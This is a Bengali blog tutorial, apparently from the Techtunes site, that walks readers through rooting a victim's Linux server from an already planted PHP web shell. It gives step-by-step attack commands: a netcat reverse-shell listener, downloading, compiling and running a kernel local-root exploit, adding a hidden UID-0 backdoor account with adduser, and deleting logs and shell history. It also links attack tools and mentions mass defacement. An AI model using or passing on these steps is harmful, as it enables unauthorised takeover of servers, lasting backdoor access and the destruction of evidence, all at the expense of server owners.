আজকে বলতে গেলে কঠিন একটা বিষয় নিয়েই লিখছি । যারা একদম প্রথম পড়ছেন তারা কিছু বুঝবেন না । যারা সিকিউরিটি নিয়ে অনেকদিন ধরেই পড়ে আছেন তাদের কাছে এটি মজার বিষয়। আচ্ছা কথা না বাড়িয়ে চলুন শুরু করি ।
.................................................................10%3∞ .........................................................
সার্ভার রুটিং কি ?
রুট হল সব সার্ভার এর administrator । কেউ যদি রুট অ্যাক্সেস পেয়ে যায় তাহলে সে পুরো সার্ভার কে নিয়ন্ত্রন করতে পারবে। যেমন ধরুন ম্যাস ডিফেস কিংবা ক্রাশ করতে পারবে। অনেক হ্যাকিং গ্রুপ এ পন্থা অবলম্বন করে । সার্ভার রুটিং এর অনেকগুলো ভাগ আছে । আপনি যদি একদম এ নিয়ে শুরু করতে চান তাহলে আপনার উইন্ডোজ পিসি দিয়ে শুরু করাই ভাল হবে ।
একটি সার্ভারে ROOT করার তিনটি উপায় আছে
1 – With local Root.
2 – With SQL by reading same important files on it root password.
3 – With exploit on software (Buffer Overflow).
আমি আপনাদেরকে দেখাব উইন্ডোজ পিসি থেকে কিভাবে লিনাক্স এ রুট করতে হয় । আপনি এ ধরনের ইংরেজি অনেক টিউটোরিয়াল পাবেন কিন্তু আপনার নিজের ভাষা তেই আপনি সবথেকে ভাল বুঝবেন ।
কাজের ধারা >>>>
যা যা লাগবে
> SHELLED SITE
> A LOCAL ROOT EXPLOIT
> NETCAT
Step 1 - Gathering informations
প্রথমে আপনার পিএইচপি শেল ওপেন করুন । আমি যেমন আমারটা করেছি ।
এখন আপনাকে জানতে হবে আপনার ভিক্টিম কি Kernel ব্যাবহার করে । এটি নিচের মত হতে পারে ।
Linux somehostingsite.com 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2013 i686
এখন আপনাকে কোন লোকাল রুট খুজে বের করতে হবে । যেমন আমার টা ছিল
2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2013 i686.
এসব খোজার জন্য আপনি exploit-db, 1337day, th3-0utl4ws এসব সাইট ব্যাবহার করতে পারেন বা গুগল এ খুজলে হাজার হাজার পাওয়া যাবে ।
Step 2 - Backconnecting to the server
এর জন্য আপনার লাগবে
NetCat
Open port (Example. 443আমি আপনাকে পোর্ট ফরওয়ার্ডিং সেখাচ্ছি না ...... গুগল এ খুজলেই পেয়ে যাবেন !!)
আপনার netcat খুলে টাইপ করুন :
-l -n -v -p 443
Hit "Enter"
এই কাজ কিন্তু cmd তে করতে হবে
তাহলে এটি রিপ্লাই দেবে এরকম "listening on [any] 443 ..."
এবার আপনার শেল এ ফিরে যান । এরপর সেখানে আপনি "BackConnect function" পাবেন । এবার আপনার কাঙ্খিত পোর্ট নাম্বার লিখুন । আমি 443 ব্যাবহার করেছি । এরপর কানেক্ট করুন
এটি আপনার netcat কে কানেক্ট করবে। আমি নিচের ছবির মতই কিছু পেয়েছি ।
Step 3 - Downloading exploit and executing it
এখন আমাদের প্রথম ধাপের উপকরন লাগবে । শেল আপ্লোড করার দুটি পন্থা আছে
1) Using shell uploader
2) Using 'wget' function (Requires backconnection)
আমি দুই নম্বরটা কে সহজ মনে করি । এরপর আপনার রুত এর লিঙ্ক টি কপি করুন । আমার টা ছিল এরকম
http://localroot.th3-0utl4ws.com/xploits...8-164.zip
এখন আপনার নেটকাটে ফিরে যান এবং লিঙ্ক টাইপ করুন । তাহলে এটি সার্ভারে "2.6.18-164.zip" নামে ফাইল ডাউনলোড করল ।
আপনার exploit টি যদি anyrandomname.c নামে ডাউনলোড হয় তাহলে আপনাকে এটি কম্পাইল করতে হবে ।
প্রথমে ডাউনলোড করুন এবং টাইপ করুন
gcc anyrandomname.c -o anyrandomname
তাহলে এটি কম্পাইল হয়ে যাবে ।
chmod 777 yourexploit'sname
আমি যেখানে your exploit লিখলাম সেখানে আপনি নিজের টা লিখবেন
এখন সর্বোপরি exploit রান করতে হবে এটি লিখে
./yourexploit'sname
Step 4 - Adding root user
মানে আসল অ্যাডমিন ছাড়া অন্যদের এখানে এখানে অ্যাড করা যাবে এটি খুব সহজ ।
এই কম্যান্ড ব্যাবহার করুন
adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M root2
কম্যান্ড এর ব্যাখা
Quote:adduser - এটি তখন ব্যাবহার করা হয় যখন কোন নতুন অ্যাকাউন্ট ওপেন হয়
-u 0 -o - Set the value of user id to 0.
-g 0 - Set the initial group number or name to 0
-G 0,1,2,3,4,6,10 - Set supplementary group to:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel
-M - 'home directory' not created for the user.
root2 - এটি আপনার ইউযারনেম .NOTE: root2 তে আপনি ইচ্ছা মত নাম দিতে পারেন
Now you need to set a password for your username.
Type in next:
passwd Root2
(Root2 is your username)
একটি উদাহরণ দেখুন
[root@fedora ~]# passwd root2
Changing password for user root2.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.
আপনি ঠিকমত করেছেন কিনা এইকমান্ড দিয়ে তা পরীক্ষা করতে পারেন
id root2
(Root2 is your username)
GNY shell - http://www.4shared.com/office/jLmzLh83/GNYShell.html
NetCat - এটি সেটাপ এ অনেকের সমস্যা হতে পারে তাই সরাসরি লিঙ্ক দিলাম না এই লিঙ্ক এ যান
http://linhost.info/2011/05/netcat-for-windows/
Clearing Logs:
এখন আমাদের সব ট্র্যাক মুছতে হবে
.rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
শেষ কথা
আপনি যদি হ্যাকিং এর প্রাথমিক বিষয় গুলো না যানেন তাহলে এই দিকে যাবেন না । এটি আপনার জন্য ক্ষতিকর হতে পারে
সমস্যা হলে বলবেন । আর এখান থেকে কিছু না বুঝলে আপনি অবশ্যই ভিডিও দেখবেন
এরকম সবকিছু > http://www.facebook.com/CY133R এ
আর আমি > http://www.facebook.com/techfreak.unknown এ
আল্লাহ হাফেয
...............................................................10%3∞ ................................................
আমি রাশেদ রাহুল। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 12 বছর 2 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 53 টি টিউন ও 50 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।
waw………tahole amio ki hacker ?